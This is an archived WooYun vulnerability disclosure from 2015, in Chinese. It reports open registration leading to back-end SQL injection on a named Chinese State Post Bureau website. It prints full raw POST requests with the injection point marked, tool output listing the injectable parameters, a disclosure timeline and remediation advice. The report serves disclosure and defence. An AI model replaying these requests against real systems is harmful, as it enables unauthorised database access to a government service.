乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-29: 细节已通知厂商并且等待厂商处理中 2015-09-30: 厂商已经确认,细节仅向厂商公开 2015-10-10: 细节向核心白帽子及相关领域专家公开 2015-10-20: 细节向普通白帽子公开 2015-10-30: 细节向实习白帽子公开 2015-11-14: 细节向公众公开
未授权访问,到SQL注入
http://kdjyxk.post.gov.cn/company/reg.jsp?provinceId=0存在注册页面,在注册页面内可以注册账户,这样我们就可以登录后台了。登录后台后里面存在多处SQL注入首先之前有人提过的例子 WooYun: 国家邮政局某后台弱口令&SQL注入&任意文件上传(打包漏洞合集) 发现还有好多处SQL注入如
分支机构管理功能里-分支机构备案管理存在SQL注入post包如下
POST /sys_getQuestionList.do?flag=1 HTTP/1.1Host: kdjyxk.post.gov.cnProxy-Connection: keep-aliveContent-Length: 63Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://kdjyxk.post.gov.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://kdjyxk.post.gov.cn/sys_getQuestionList.do?flag=1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: JSESSIONID=C552137D3B39FFF8023D295C63330E8DquestionKey=*&questionDate=&questionDateEnd=&questionStatus=0
分支机构管理功能里-分支机构备案账号管理存在SQL注入
POST /register_beianLogin.do?flag=1 HTTP/1.1Host: kdjyxk.post.gov.cnProxy-Connection: keep-aliveContent-Length: 65Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://kdjyxk.post.gov.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://kdjyxk.post.gov.cn/register_beianLogin.do?flag=1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: JSESSIONID=C552137D3B39FFF8023D295C63330E8DfbcomcName=&fbcomcLoginName=&province=1&city=0&x=28&y=16
存在SQL注入参数
[0] place: POST, parameter: fbcomcName, type: Single quoted string (default)[1] place: POST, parameter: fbcomcLoginName, type: Single quoted string[2] place: POST, parameter: province, type: Unescaped numeric[3] place: POST, parameter: city, type: Unescaped numeric
questionKey=*&questionDate=&questionDateEnd=&questionStatus=0</code>
防止未授权访问,参数化查询过滤SQL注入,上waf
危害等级:高
漏洞Rank:10
确认时间:2015-09-30 08:59
感谢您的贡献
暂无